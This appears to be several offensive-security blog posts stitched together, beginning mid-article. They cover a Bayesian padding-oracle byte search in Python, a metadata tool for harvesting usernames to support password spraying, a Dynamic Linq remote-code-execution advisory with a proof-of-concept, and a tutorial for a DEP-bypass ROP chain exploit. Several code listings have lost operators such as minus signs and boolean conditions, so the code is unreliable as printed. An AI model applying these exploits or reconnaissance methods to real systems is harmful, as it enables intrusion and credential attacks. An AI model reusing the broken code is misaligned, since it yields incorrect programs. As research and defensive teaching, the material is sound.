Let’s be more precise with what we mean by “noisy”: a noisy oracle is one that gives us a correct answer some of the time, but not all the time. Let’s call the false positive probability p_1 and the false negative probability p_2. To be clear, these are conditional probabilities: the probability that a positive result is a false positive, and that a negative result is a false negative, respectively. In some cases we may have p_1 = p_2, but in general there is no need to assume this.

Math

First, let’s recall Bayes’ theorem, which we will use to update our prior distribution. Let H be a hypothesis, and E be some evidence on that hypothesis. Then Bayes’ theorem says that

P(H|E) = \frac{P(E|H) P(H)}{P(E)} = \frac{P(E|H) P(H)}{P(E|H)P(H) + P(E|\neg H) P(\neg H)}

Both of the attacks mentioned above (padding validation and MAC validation) apply the oracle to a byte search. We scan through 256 candidate bytes, one of which has a property that the rest of the bytes do not have, which our oracle is (at least sometimes) able to detect. In both cases, we start from the assumption that each byte is equally likely to satisfy our test.

To put this into notation, we have 256 hypotheses, H_1 through H_{256}. Initially, we start with a uniform distribution: P(H_1) = \ldots = P(H_{256}) = \frac{1}{256}.

We’ll use i, j for list indices. We have 1 \le i, j \le 256 and i \ne j.

We can get two kinds of evidence: E \in {T, F} depending on whether the oracle gives us True or False on some query for some byte. We can subscript this by the index of the tested byte; in practice, this’ll just be i or j depending on whether the byte we’re testing corresponds to the hypothesis we’re considering. So we need to be able to evaluate probabilities for H_i together with T_i, T_j, F_i, F_j.

Now, let’s do some case work as we expand each of the terms in Bayes’ theorem:

  • P(H_i) starts at \frac{1}{256} and gets updated on each oracle query.
  • P(\neg H_i) = 1 - P(H_i).
    • Cases where subscripts match:
    • P(T_i | H_i) = 1-p_2 (true positive)
    • P(F_i | H_i) = p_2 (false negative)
    • P(T_i | \neg H_i) = p_1 (false positive)
    • P(F_i | \neg H_i) = 1 - p_1 (true negative)
  • Cases where subscripts differ:
    • P(T_i | H_j) = p_1 (false positive)
    • P(F_i | H_j) = 1 - p_1 (true negative)
    • P(T_i | \neg H_j) = \ldots (could be true or false positive)
      • Probability of true positive: P(H_i | \neg H_j) (1-p_2)
        • P(H_i | \neg H_j) = \frac{P(H_i)}{1-P(H_j)}
      • Probability of false positive: P(\neg H_i | \neg H_j) p_1
        • P(\neg H_i | \neg H_j) = 1 - P(H_i | \neg H_j)
    • P(F_i | \neg H_j) = \ldots (could be true or false negative)
      • Probability of true negative: P(\neg H_i | \neg H_j) (1-p_1)
      • Probability of false negative: P(H_i | \neg H_j) p_2

Clear? Good. Let’s move on.

Strategy

We’ll consider three different strategies for making queries:

  • Exhaustive: We will make a large number of queries for each byte. We will simply loop through all 256 bytes, querying each one, until one of them reaches the target confidence threshold. This is the simplest and most commonly recommended strategy; it is also by far the least efficient. It does not adapt to the results of previous queries, and it requires a very large number of oracle queries.
  • Information-guided: We will estimate the expected information gain from each possible oracle query, then choose the query with the greatest expected information gain. This requires us to compute 512 posterior distributions per step and measure each distribution’s entropy; this does require significantly more local computation. However, this scheme is still a big improvement over the previous one.
  • Probability-guided: We will always query for the byte whose hypothesis has the highest estimated probability. This has much lower compute overhead than the information-guided strategy; in terms of performance, the comparison is very interesting and we will discuss it in detail below.

Implementation

Let’s codify all of the above into a Python class, ByteSearch. We’ll implement the math, but we won’t start there; first, let’s just encapsulate that complexity within a self.get_updated_confidences method which updates our priors based on the results of a single oracle query. Then we can define the following scaffolding:

class ByteSearch:
def __init__(self, oracle, confidence_threshold=0.9, quiet=True):
self._counter = 0
self.oracle = oracle
self.queries = [[] for _ in range(256)]
self.confidences = [1/256]*256
self.confidence_threshold = confidence_threshold
self.quiet = quiet
def update_confidences(self, index, result):
"""Given an oracle result for a given byte, update the confidences for each byte."""
self.confidences = self.get_updated_confidences(self.confidences, index, result)
def pick_exhaustive(self):
return self._counter % 256
def pick_by_confidence(self):
"""Pick a byte to test based on the current confidences."""
return max(range(256), key=lambda i: self.confidences[i])
def pick_by_entropy(self):
"""Pick a byte to test based on expected reduction in entropy."""
# NOTE: VERY SLOW – for demo, try replacing 256 with 16 here and in randrange
entropies = []
for i in range(256):
e_if_t = self.get_entropy(self.get_updated_confidences(self.confidences, i, True))
e_if_f = self.get_entropy(self.get_updated_confidences(self.confidences, i, False))
p_t = self.confidences[i]
p_f = 1 p_t
entropies.append(p_t * e_if_t + p_f * e_if_f)
return min(range(256), key=lambda i: entropies[i])
def query_byte(self, index):
"""Query the oracle for a given byte."""
self._counter += 1
result = self.oracle(index)
self.queries[index].append(result)
self.update_confidences(index, result)
if not self.quiet and self._counter & 0xFF == 0:
print(end=".", flush=True)
return result
def search(self, strategy):
"""Search for the plaintext byte by querying the oracle."""
threshold = self.confidence_threshold
while max(self.confidences) < threshold:
self.query_byte(strategy())
num_queries.append(sum(len(l) for l in self.queries))
return max(range(256), key=lambda i: self.confidences[i])

The idea is that calling code would invoke search() on an instance of this class, passing in something like the instance’s pick_by_confidence or pick_by_entropy bound method as an argument. The above code depends on a few static methods which encapsulate the mathematical machinery:

@staticmethod
def bayes(h, e_given_h, e_given_not_h):
"""Update the posterior probability of h given e.
e: evidence
h: hypothesis
e_given_h: probability of e given h
e_given_not_h: probability of e given not h
"""
return e_given_h * h / (e_given_h * h + e_given_not_h * (1 h))
@staticmethod
def get_updated_confidences(confidences, index, result):
new_confidences = confidences[:] # shallow copy
for j in range(256):
p_h = confidences[j]
if index == j:
p_e_given_h = 1 FN_RATE if result else FN_RATE
p_e_given_not_h = FP_RATE if result else 1 FP_RATE
else:
p_e_given_h = FP_RATE if result else 1 FP_RATE
p_hi_given_not_hj = confidences[index] / (1 confidences[j])
p_not_hi_given_not_hj = 1 p_hi_given_not_hj
if result:
p_e_given_not_h = p_hi_given_not_hj * (1 FN_RATE) + p_not_hi_given_not_hj * FP_RATE
else:
p_e_given_not_h = p_hi_given_not_hj * FN_RATE + p_not_hi_given_not_hj * (1 FP_RATE)
new_confidences[j] = ByteSearch.bayes(p_h, p_e_given_h, p_e_given_not_h)
return new_confidences
@staticmethod
def get_entropy(dist):
return sum(p * log2(p) for p in dist if p)

The bayes method implements Bayes’ theorem. The get_updated_confidences method implements the math we discussed above. The get_entropy method computes the entropy of a distribution. These static methods, together with the previous snippet, provide a full implementation for ByteSearch. You can find a test script which defines this class and uses it to run a padding oracle attack here.

Performance

In order to carry out a full attack, which requires recovering 16 bytes in a row without any errors, we need each individual byte search to return an accurate result with high probability. If our confidence in a single search’s correctness is c, then our confidence in the success of the overall attack is c^{16}. Even if c is large, c^{16} may not be: e.g. 0.9^{16} \approx 0.18, 0.95^{16} \approx 0.44, and 0.99^{16} \approx 0.86. Even c = 0.999 gives an overall failure rate of roughly 1.5%.

In the following measurements, I used c = 0.999. I set the false-positive and false-negative rates to 0.4; in other words, the oracle gives the correct answer only 60% of the time. There is nothing special about this value, and it could be lower – I’ve successfully tested the code with accuracy rates as low as 50.1% – but I thought 60% is both low enough to be interesting and high enough to be practical.

For a baseline reference, with a perfect oracle, a padding oracle attack on a 16-byte block of ciphertext is expected to require an average of 128 queries per byte, giving a total of 2048 oracle queries to complete the attack in the average case, and 4096 queries in the worst case.

In comparison to these roughly two thousand queries, the exhaustive strategy described above is able to complete the attack, with per-byte confidences of 0.999, in an average of about half a million unreliable oracle queries. This is quite a bit more overhead: our number of oracle queries has increased by a factor of roughly 250. To be fair, we’ve gone from a perfect oracle to a very unreliable one, so perhaps some credit is due for the fact that we can complete the attack at all. But even so, this is a lot of overhead – and it turns out we can do much better.

The entropy-guided strategy performs better in terms of oracle queries; however, while it uses fewer queries, it comes at the cost of much higher CPU overhead. This workload parallelizes trivially, but a naive implementation like the one given above is very slow and is not recommended in practice.

Perhaps surprisingly, the probability-guided strategy performs best of all, completing in an average of just over fifty thousand queries. This is roughly a tenfold improvement over the exhaustive strategy, and is several times better than the entropy-guided strategy, despite following a simpler and more naive heuristic. This strategy is recommended in practice. But why does it work so much better?

Analysis

In this section I’d like to share some illustrations of each strategy in action. These take place in a simplified setting: we have a search space of size 16 (and if this
reduction bothers you, try thinking of it as a hex digit being checked by a non-constant-time string comparison), and our false-positive and false-negative rates are both fixed at 0.25, giving a 75% accurate oracle. These changes make the search terminate faster and help it fit better on screen. In each search, the target digit is 0x8 (so, the 9th column).

On the left, I’ve included two charts: the first one indicates the Bayesian confidence levels for each digit, and the second one indicates (on a log scale) the expected information gained by querying for that digit. Stated differently, this chart shows the expected reduction in entropy in the confidence distribution after the given query.

Let’s start with a look at exhaustive search. Whenever someone tells you “just make more oracle queries”, this (or – even worse – its depth-first analogue) is usually what they’re recommending. The inefficiency should be obvious.

Note how many oracle queries get wasted on confirming things that we basically already know, e.g. ruling out digits that already have very low confidence.

Now that we’ve seen the worst strategy, let’s see the best one:

This video includes a few runs of the search with different RNG seeds. Note how this strategy essentially dives in as soon as it finds a promising option, taking a very “depth-first” approach to exploring the search space. Intuitively this seems well-matched to the problem at hand.

Finally, we’ll look at the middle option, which happens to exhibit some different behavior from the others. In this one, rather than being guided by confidences, we are guided by expected information gained, which is simply computed by computing the Bayesian adjustments that would occur if an oracle query for a given digit returned true or false, taking an average of the entropies of those distributions weighted by their estimated probabilities (using our current confidence levels), and taking the difference between this and our current entropy; in effect, this chooses the query which is expected to minimize post-query entropy in the confidence distribution.

This exhibits some interesting behavior that we don’t see in the other strategies: it is capable of rapidly honing in on promising options, much like the confidence-guided strategy, but it does not do so immediately, even if it gets an initial positive result from the oracle. Instead, it prefers a more thorough, somewhat breadth-first approach which stands in heavy contrast to the confidence-guided strategy (which may not even end up querying for every digit, if it finds a promising one early enough).

The reason for this difference may not be immediately obvious, but it turns out to be simple: while initial positive results are promising, they also carry a degree of risk, because they can be undone: a subsequent negative response from the oracle for the same digit (which is still considered much more likely than not) would reset the digit’s confidence level close to baseline, actually increasing the distribution’s entropy. In contrast, querying other digits about which less is known carries a similar level of upside but much less downside, so these options end up being favored, at least until we’re able to rule them out as frontrunners.

As I said above, this is just a starting point, and there are other metrics that could be used here (e.g. it might be interesting to try using Kullback-Leibler divergence rather than simple arithmetic difference between confidence distributions). But among these options, the confidence-guided strategy stands out as a clear frontrunner, and performs much better than the other strategies, especially as the error rate gets close to 50%. If it finds a promising digit early on, it hones in on it, and it is willing to accept small incremental progress in order to refine its estimate about the frontrunner, which ultimately is what is necessary to cross the confidence threshold quickly; however, in spite of this focus on speed, it remains very reliable and can refine its results to arbitrary levels of confidence.

Conclusions

Presentations of oracle-based attacks typically assume a perfect oracle; if the noisy-oracle case is treated at all, usually it is assumed that a perfect oracle will be simulated by increasing the noisy oracle’s sample size to the point where its error rate is negligible in practice. This strategy, while simple, is wildly inefficient. In this post, I have shared some strategies for reducing the number of oracle queries required to complete some common attacks. These strategies do not seem to be too widely known; I have not seen them discussed, and all of the above work was derived independently. I hope that this post will help to popularize these strategies.

In closing, I would note that there are opportunities for follow-up work applying these methods to other common oracle-based attacks, as well as relaxing some of the simplifying assumptions outlined above.

I’d like to thank Giacomo Pope, Kevin Henry, and Gerald Doussot for their feedback on this post and for their careful review. Any remaining errors are mine alone.

New Sources of Microsoft Office Metadata – Tool Release MetadataPlus

TL;DR – 31 usernames extracted vs 13 from the next leading brand!

Introduction

Open Source Intelligence Gathering (OSINT) can be an activity in itself and can also form a solid foundation for Full Spectrum Attack Simulations. Getting an idea of username formats as well as a number of known usernames increases the chances of success with password spraying. In addition, any information that can be gathered such as hostname conventions, internal servers, or Operating System types could all inform decisions made once a foothold has been established. Finally, the more information the better when it comes to social engineering.

When conducting research for a macro-based client/server framework, I discovered a number of new places within different types of office documents that contained useful metadata (such as usernames and hostnames) that were not recovered using industry standard tools such as FOCA. This post introduces a new tool, MetadataPlus, which can be found on the NCC Group GitHub (https://github.com/nccgroup/MetadataPlus) and describes the new metadata sources covered by this tool.

In a test case involving roughly 120 publicly accessible documents, FOCA extracted 13 usernames, while MetadataPlus extracted 31- and due to the formatting of the output, also lead to the discovery of the unusual username format pattern in use.

Tool Overview

It is probably fairly well known that Office files can be extracted like a zip file to gain access to internal files that make up the document. MetadataPlus works by extracting document files and looking for specific tags or patterns within the internal files. MetadataPlus is designed to cover a number of Microsoft Office filetypes. It began with xlsx/xlsm (Excel) and docx/docm (Word) but was expanded to trial against all possible save formats for a number of Office products. The ones found to work and included now by default are:

  • xlsx/xlsm, docx/docm – Word and Excel files
  • xltx/xltm, dotx/dotm, potx/potm – template files for Excel, Word, and PowerPoint
  • ppt/pptx – PowerPoint files

The program includes a -a option that will attempt to process every file in the folder, and in theory it should work on any Office file that can be extracted out into XML files, however, the ones listed above were the ones found to work during testing.

Metadata Locations

Last saved location

For the first new location of metadata, we need to look at the workbook.xml file of an Excel document. If this contains a tag with the value absPath then this shows the document’s last saved location which could potentially include usernames or hostnames. For example, the hostname of a device if it was saved on a network drive such as \networkedcomputer01\docstest.xlsx, or a username if it was saved locally somewhere like c:\users\bilbo1\Documentstest.xlsx. In the following screenshot from a demonstration document we can find the username gragra576.

Comments files

The second new location for metadata is any comments file extracted from the document. The comments file includes the author name which can be their username or name, and it is also possible to view the comment – even if this doesn’t show up when you open the document itself. As an example, I have comments1.xml with the <author> tag showing another username:

External and image links

External links and image link files contain links that have been found to include links to unsecure (HTTP) servers that might indicate an internal location on a network. These have also included usernames where the server was set up with a user folder structure, as well as hostnames and network filepaths. Additional information can sometimes be inferred, such as an external link to a OneDrive folder – indicating O365 or OneDrive in use. Further, there is always the chance that additional domains or subdomains will be discovered that can be added to your list of targets for investigation. I have tried to clear most of the noise from these responses so that what is left should be useful for further investigation. In a number of cases I found external links to user folders using “/” instead of “\”, and for this reason, username pattern matching was extended to look for users using this unusual style. In the following example, a link has been added to a network server that seems to include a Windows style folder structure, and the username rodmig358:

Hidden Sheets

Hidden sheets are designated using the element tag State=hidden, and MetadataPlus calls out these hidden sheets by file, meaning that they can be unhidden and investigated manually as it is possible they may contain something useful that was expected to remain private. Unhiding is easily performed in Excel for example by right-clicking on a visible sheet and choosing Unhide… however, this would be tedious to check over a vast trove of documents, and so this list can point you towards documents where this may be worthwhile.

Creator tag

The <dc:creator> tag contains the name of the creator of the document and can be the name or username. In some instances this has been seen to include both in the following way “Chris Nevin – cnevin” and Metadataplus will try and separate this into a name and username if this is seen.

Basic search

As shown above MetadataPlus looks for users and hostnames in specific locations, however, it also contains pattern matching to extract usernames from filepaths such as c:\users\bill, c:\documents and settings\bill or /users/bill. This pattern matching is also used to perform some basic grepping on each individual file to search for usernames, names, and hostnames that may appear in places we did not expect. MetadataPlus also searches for the string “password” and will flag documents and strings containing this word and contains the option to search for a user supplied string that may be relevant to your specific target or could include searching for something like API keys.

Extracting embedded documents and media

Office documents can include media as well as other embedded documents which can be additional sources of metadata. MetadataPlus has -m and -e options which will extract these files for further analysis. While some image files may come from external sources, or be stripped of metadata, some may be included locally without processing and could include additional data when examined with a tool such as exiftool. Embedded documents may contain additional information that can be analysed with MetadataPlus by moving the exe into the Embed folder and running again, and in the test case elaborated on below, an additional 5 names were extracted from embedded documents within the original documents.

Results Output and Analysis

Where possible MetadataPlus is designed to display data in a way that is useful and may aid in further discoveries. The tool prints a number of outputs at the end, including output from documents that contain both names and usernames as well as the tags these were pulled from – although for ease of use in other tools, MetadataPlus also prints a raw list of usernames, names, and email addresses. In the following example, a name is often pulled from the same document as a username:

The usernames appear to be random, however, as the name is often taken from who the file was last modified by then it stands to reason that the username taken from the filepath might belong to this name. At first, the usernames appear to be random letters and numbers, however, thanks to linking the names and usernames in the output, it becomes apparent that there is a pattern: first three letters of the surname + first three letters of the first name + three numbers. While the three numbers would take further investigation (they could be a building or department tag for example, or they may actually be random) the usernames initially appear to be completely unconnected but this linking in the output makes it clear there is a pattern after all. This could be useful in social engineering as well, as something like calling for a password reset without knowing the name to a username or vice versa would be likely to end in failure.

Closing Thoughts

As a final example, the following shows the list of unique usernames MetadataPlus was able to pull from 9 documents:

In contrast, FOCA only returned full names:

It should be noted that these documents were created to highlight the difference as FOCA does not make it easy to distinguish between names and usernames in their output here and made it difficult to show a comparison between the tools. In the roughly 120 documents analysed from a public document test case for one organisation MetadataPlus found an additional 18 usernames to the 13 discovered by FOCA.

https://github.com/nccgroup/MetadataPlus

Dynamic Linq Injection Remote Code Execution Vulnerability (CVE-2023-32571)

Product Details

NameSystem.Linq.Dynamic.Core
Affected versions1.0.7.10 to 1.2.25
Fixed versions>= 1.3.0
URLhttps://www.dynamic-linq.net/

Vulnerability Summary

CVECVE-2023-32571
CWECWE-184: Incomplete List of Disallowed Inputs
CVSSv3.1 vectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVSSv3.1 base score 9.1

Overview

What is Dynamic Linq?

Dynamic Linq is an open source .NET library that allows developers to easily incorporate flexible data filtering into their applications and services. It parses user-supplied text input and compiles and executes a lambda.

The library has over 80m downloads from the NuGet package manager site, and is used in a number of large projects including frameworks such as AspNetBoilerPlate, meaning it forms part of many applications.

The vulnerability

Users can execute arbitrary code and commands where user input is passed to Dynmic Linq methods such as .Where(...), .All(...), .Any(...) and .OrderBy(...). The .OrderBy(...) method is commonly provided with unchecked user input by developers, which results in arbitrary code execution. The code/commands will be executed in the context of the process that utilises Dynamic Linq. This is expected to be a low-privileged user or service account. Where search functionality is exposed to anonymous users for example, this may be exploitable pre-authentication.

Root Cause Analysis

Dynamic Linq is used to compile and execute predicates that are supplied in text form. The input will be compiled, subject to some restrictions intended to prevent arbitrary method execution. Per the documentation, these safety checks are:

  • Only allow-listed primitive types can be explicitly instantiated
  • The only methods that may be called are:
    • Methods on Accessible Types
    • Static methods in the Math and Convert namespaces
    • Methods from the IEnumerable and IQueryable interfaces

The Accessible Types are the Linq primitive types (string, datetime, GUID, various numerical types, object etc.) and the System.Math and System.Convert namespaces (see Dynamic Linq – Accessible Types).

Additionally, Dynamic Linq will permit its own aggregate methods to be called on objects that implement the IEnumerable and IQueryable interfaces. The aggregate methods include .Where(...), .Skip(...), .First() etc.

However, In 2016 a pull request was made and accepted titled “Add unit test and fix public methods access”. This was intended to allow access to public methods on classes retrieved via Linq queries. This functionality had been intentionally prohibited by the original design for security reasons.

The commit changed the existing test used to determine if a method was permitted to be called:

Pre-commit

case 1:
    MethodInfo method = (MethodInfo)mb;
    if (!IsPredefinedType(method.DeclaringType))
        throw ParseError(errorPos, Res.MethodsAreInaccessible, GetTypeName(method.DeclaringType));

Post-commit

case 1:
    MethodInfo method = (MethodInfo)mb;
    if (!IsPredefinedType(method.DeclaringType)    !(method.IsPublic    IsPredefinedType(method.ReturnType)))
        throw ParseError(errorPos, Res.MethodsAreInaccessible, GetTypeName(method.DeclaringType));

In the original code, methods were only callable on predefined types (the Accessible Types). The commit widened this test, to also allow public methods that returned an Accessible Type to be called. This permits numerous dangerous methods to be called, the most useful of which is the Invoke method.

Invoke is a generic method found on on all Method types, so by necessity its return type is Object, which can later be cast to the appropriate type. As the Object type is an Accessible Type, the Invoke method can be called on any Method type, allowing any method to be called on any object (and also any static method).

Invoking Arbitrary Methods

As the Invoke method is public, and it is declared to return an Object which is an Accessible Type the vulnerable versions of the Dynamic Linq library allow any method to be Invoked.

This can be used to execute arbitrary methods on any object as illustrated in this simple proof of concept:

  1. Create a new .Net console project
$> mkdir dynamic-linq-poc
$> cd dynamic-linq-poc
$> dotnet new console
  1. Replace the contents of Program.cs:
using System;
using System.Linq;
using System.Linq.Dynamic.Core;
public class Program

{
  public static void Main()
  {
    var baseQuery = new int[] { 1, 2, 3, 4, 5 }.AsQueryable();
    string predicate = "\"\".GetType().Assembly.GetName().Name.ToString() != \"NCC Group\"";
    var result = baseQuery.OrderBy(predicate);
    foreach (var val in result)
    {
      Console.WriteLine(val);
    }
  }
}
  1. Add a reference to the Dynamic Linq library:
$> dotnet add package System.Linq.Dynamic.Core --version 1.2.25
  1. Run the program and note the error message – “Methods on type ‘Assembly’ are not accessible”.

As expected, it is not permitted to call the GetName method on an object of type Assembly as the Assembly type is not an Accessible Type.

  1. Edit the predicate string as follows:
using System;
using System.Linq;
using System.Linq.Dynamic.Core;
public class Program

{
  public static void Main()
  {
    var baseQuery = new int[] { 1, 2, 3, 4, 5 }.AsQueryable();
    string predicate = "\"\".GetType().Assembly.DefinedTypes.Where(it.name == \"Assembly\").First()
     .DeclaredMethods.Where(it.Name == \"GetName\").First().Invoke(\"\".GetType().Assembly,
     new Object[] {} ).Name.ToString() != \"NCC Group\"";
    var result = baseQuery.OrderBy(predicate);
    foreach (var val in result)
    {
      Console.WriteLine(val);
    }
  }
}
  1. Run the program again, and note that the code executes successfully.

Whilst the two predicates are semantically identical, the first one is prohibited as expected, but the second one is permitted as it uses the Invoke method to call the GetName method on the Assembly type. This technique is proven to allow the execution of OS commands and loading of arbitrary assemblies.

Impact

As Dynamic Linq is a library, the exact impact depends on the use-case within dependent projects. A common pattern seen across many web application/API projects is to use Dynamic Linq for sorting and pagination – user input is passed to the OrderBy method of the IEnumerable interface. For example:

[HttpPost(Name = "SearchItems")]
public IEnumerable<Item> Post(SearchItemReq req)
{
    return db.Items.Where(i => i.Type == req.Type).OrderBy(req.Order).ToArray();
}

In the above example the .OrderBy(...) method takes a string input directly from the user-supplied request input. This is a relatively common pattern observed in many code bases.

Prior to the introduction of this vulnerability this was a safe practice, however the vulnerability means that it is possible to leverage this to obtain remote code execution. This functionality is often available pre-authentication.

The vulnerability is known to have affected numerous dependents including the following, which in turn is expected to have a significant impact:

  • Asp.Net Boilerplate (ABP) Framework
  • Microsoft Rules Engine
  • .Net Entity Framework
  • Various CMSes including Umbraco CMS

Patching

Update System.Linq.Dynamic.Core to version 1.3.0 or greater.

Don’t forget about your upstream dependencies! Integrating tools such as OWASP Dependency Check or Trivy into your CI/CD pipeline can help you detect vulnerable dependencies early so you don’t introduce vulnerabilities into your product.

Defeating Windows DEP With A Custom ROP Chain

Overview

This article explains how to write a custom ROP (Return Oriented Programming) chain to bypass Data Execution Prevention (DEP) on a Windows 10 system. DEP makes certain parts of memory (e.g., the stack) used by an application non-executable. This means that overwriting EIP with a “JMP ESP” (or similar) instruction and then freely executing shellcode on the stack will not be possible.

The main goal of using a ROP chain is to combine several ROP gadgets (assembly instructions stored at specific addresses within the DLL/EXE) together to bypass DEP and execute code on the stack. Each ROP gadget will end with a ret instruction, which will allow the next gadget address to be popped into EIP and continue executing that next gadget. Executing the ROP gadgets one after another will lead to executing the type of assembly code that will perform one of the following actions:

  • Build and execute shellcode (e.g., a reverse shell) using just the ROP gadgets.
  • Disable DEP and then jump to the shellcode address that is now allowed to be executed on the stack.

The first method would be very difficult to implement and will require a lot of ROP gadgets, and hence it is very common to create a ROP chain that will first disable DEP on the system and then execute the shellcode placed on the stack.

There are various Windows APIs that can help us disable or bypass DEP, but the three most common ones are VirtualAlloc, VirtualProtect and WriteProcessMemory. In this article we will be covering VirtualAlloc which allocates and changes the permissions of a specific memory region (e.g., the stack) of the running process (our application). So in our case we will use VirtualAlloc to make the stack executable, which in turn will allow the shellcode to be executed from the stack.

Automating the process of creating a complete ROP chain using the Mona Python plugin for Immunity Debugger is a well-known method of bypassing DEP. However, there is a possibility that Mona will fail to create a complete ROP chain and it will be up to the exploit developer to finalize it.

While it is possible to use Mona to create and finalize a ROP chain, we will take a completely different approach and write our ROP chain from scratch. The exploit developer will need to write each ROP gadget manually in order to create a complete ROP chain. While this method of bypassing DEP is harder to implement, it will provide a much deeper understanding on how to overcome the limitation of some automated tools and be comfortable at writing a custom ROP chain.

Setting Up Our Exploit Dev Environment

We will be using a Windows 10 64-bit VM for our exploit development. The vulnerable application can be downloaded from the following link: ASX to MP3 converter.

It is important to note that while the operating system is 64-bit, the actual application is 32-bit. This will be obvious once we start testing the application in a debugger and all the memory addresses used by the software will be 4 bytes long (DWORD, e.g., 0x12345678). Therefore, the ROP chain techniques that are explained in this article are specifically aimed at exploiting 32-bit applications where the arguments for an API call (e.g., VirtualAlloc) are placed on the stack.

Our exploit will be based on this proof-of-concept. The two CVEs (CVE-2017-15221, CVE-2009-1324) associated with the exploit do not provide the exact details about the type of vulnerable function used by the application. The advisory provides generic information about an overly large .m3u file that causes memory corruption via a stack-based buffer overflow.

We will be using WinDBG Preview (installed from Microsoft Store) to help us write a custom ROP chain.

We will also need to enable DEP for the application. Typing “advanced system settings” in the Start menu will open a new window. We will then need to select “Settings” in the Performance section and enable DEP for all programs as shown below. The system will then need to be restarted.

Selecting Our Target Module

We are specifically interested in the modules that don’t have ASLR/Rebase enabled to make the exploit stable across reboots. This is necessary because, otherwise, the ROP gadget addresses would change after each reboot of the system.

What’s important to note here is that in order to overcome ASLR we could either cause a memory leak (an advanced technique that is not covered here), take a brute-force approach by guessing the base address of the DLL (this is possible in 32-bit applications but unrealistic for 64-bit applications), or pick a module/DLL that doesn’t have ASRL/Rebase enabled at all. In this case we will take the latter approach, which is simplest.

The exact way to identify which modules don’t have ASRL/Rebase enabled is not covered in this article. However, if the reader is interested they could install the Mona plugin for WinDBG or just use the “lm” command in WinDBG to identify which modules they could use.

Apart from the main application executable (ASX2MP3Converter.exe), we only have one DLL (MSA2Mfilter03.dll) that doesn’t have ASLR/Rebase enabled. We will use this DLL for our exploit development.

The reason why we can’t use the main executable is because its address range (0x004000000x00518000) contains null bytes. A null byte is a very common bad character that can terminate our exploit before it is fully executed, which is the case for the particular vulnerability we are exploiting.

We will need to keep in mind the following bad characters to avoid during our exploit development process:

00, 0a

Please note that we will be using the following Python exploit as our starting point. We will not be covering the absolute basics of exploit development in this article (e.g., finding the offset to EIP and what bad characters to avoid). It is already assumed that the reader is familiar with that process. This tutorial is aimed at intermediate-level exploit developers that are already familiar with such basic tasks.

It is also important to note that the below PoC Python exploit needs to be executed to generate an .m3u file, which in turn needs to be dragged onto the application for it to load the file and crash. We will be updating our ROP chain throughout this article and generating a new .m3u file every time.

buffer = "http://"
buffer += "A"*17417
buffer += "BBBB" #EIP overwrite
buffer += "CCCC" #filler
buffer += "D"*(18000-len(buffer))
f=open("exploit.m3u", "w")
f.write(buffer)
f.close()

Writing a Custom ROP Chain

The custom ROP chain will be focused on using the specific ROP gadgets to dynamically prepare a call to VirtualAlloc in memory. The placeholder address of the API and its arguments will be patched on the stack with the actual values required to perform the call correctly. After the call to VirtualAlloc is made and DEP is bypassed, we will return to an address on the stack and execute our shellcode.

This technique is based on what I learned from OffSec’s OSED course. If you are interested in learning more about modern exploit development on Windows systems I highly recommend you check it out.

Step 1: Obtaining ROP Gadgets

We will use a tool called RP++ to help us obtain ROP gadgets from the specific DLL (MSA2Mfilter03.dll). We will also instruct the tool to exclude the gadget addresses with the bad characters in them, otherwise the gadget will terminate the ROP chain and prevent us from exploiting the application.

rp-win.exe -f "C:\Program Files (x86)\Mini-stream\ASX to MP3 Converter\MSA2Mfilter03.dll" -r 5 --bad-bytes \x0a\x00 > rop.txt

Reducing the number (5) of assembly instructions per gadget would decrease the number of gadgets the tool finds in the DLL, making it harder to find the right gadgets to create a complete ROP chain. Increasing the number would make it harder for us to overcome the junk assembly instructions inside gadgets that may affect our ROP chain and make them not execute correctly. That’s why setting the value to 5 is usually recommended. More information about overcoming irrelevant assembly instructions in ROP gadgets is explained further in the article.

Step 2: Configuring VirtualAlloc Placeholder Values

We will update our exploit code as follows:

from struct import pack
shellcode = "E" * 400 #we will replace this with the real shellcode in the end
VA_placeholder = pack("<L", (0x45454545))  # VirtualAlloc Address
VA_placeholder += pack("<L", (0x46464646)) # Shellcode Return Address
VA_placeholder += pack("<L", (0x47474747)) # lpAddress - Shellcode Address
VA_placeholder += pack("<L", (0x48484848)) # dwSize
VA_placeholder += pack("<L", (0x49494949)) # flAllocationType
VA_placeholder += pack("<L", (0x50505050)) # flProtect

rop_chain = pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x42424242)) # filler
rop_chain += pack("<L", (0x43434343)) # next gadget

buffer = "http://"
buffer += "A" * (17417 - len(VA_placeholder))
buffer += VA_placeholder
buffer += rop_chain #EIP overwrite
buffer += "\x90" * 20 #nop sled
buffer += shellcode
buffer += "D"*(18000-len(buffer))

f=open("exploit.m3u", "w")
f.write(buffer)
f.close()

The above code contains our VirtualAlloc placeholder values in the first part of the buffer right before the EIP gets overwritten. Each argument for the API is explained later in this article, but more information about it can be found here.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

Apart from the 4 arguments required for the API, our placeholder section also contains the return address (currently replaced with 0x46464646) right after the API call itself (currently replaced with 0x45454545). The return address is needed because once we get to the point of executing our patched VirtualAlloc API with its arguments, we will essentially be performing a simulated function call in memory. Each function must return somewhere after it’s done executing its code. In this case we will need to return to our shellcode. Since the API call will make the stack executable, it will allow us to safely return to it and start executing the shellcode on the stack.

Step 3: Our First ROP Gadget

You can see that the above exploit code already contains the first ROP gadget that will overwrite EIP.

rop_chain = pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;

The idea behind the first ROP gadget is to make a general CPU register point to the placeholder address containing 0x45454545 on the stack, and then patch it with the real address of VirtualAlloc (located in kernel32.dll). In this case we will use ESI and a few other registers for that purpose.

In order for ESI to contain that address, we will first need to move the value that ESP is pointing to (the top of the stack) into ESI. We will then perform a few mathematical calculations with the help of other general CPU registers and make ESI point to the placeholder address 0x45454545. The reason why we can’t manipulate ESP instead of ESI is because ESP always needs to point to the top of the stack containing the next ROP gadget to execute. If we make ESP point to the placeholder address instead, there will be no other register pointing to the second ROP gadget on the stack and our ROP chain will break. Luckily, we have plenty of other general CPU registers we can use for that purpose and so we use ESI here.

The actual ROP gadget itself was found in the rop.txt file that the RP++ tool generated for us. I recommend you use a text editor that supports REGEX search functions to help you locate the right gadget quickly. For example, I used the following REGEX search string in Sublime:

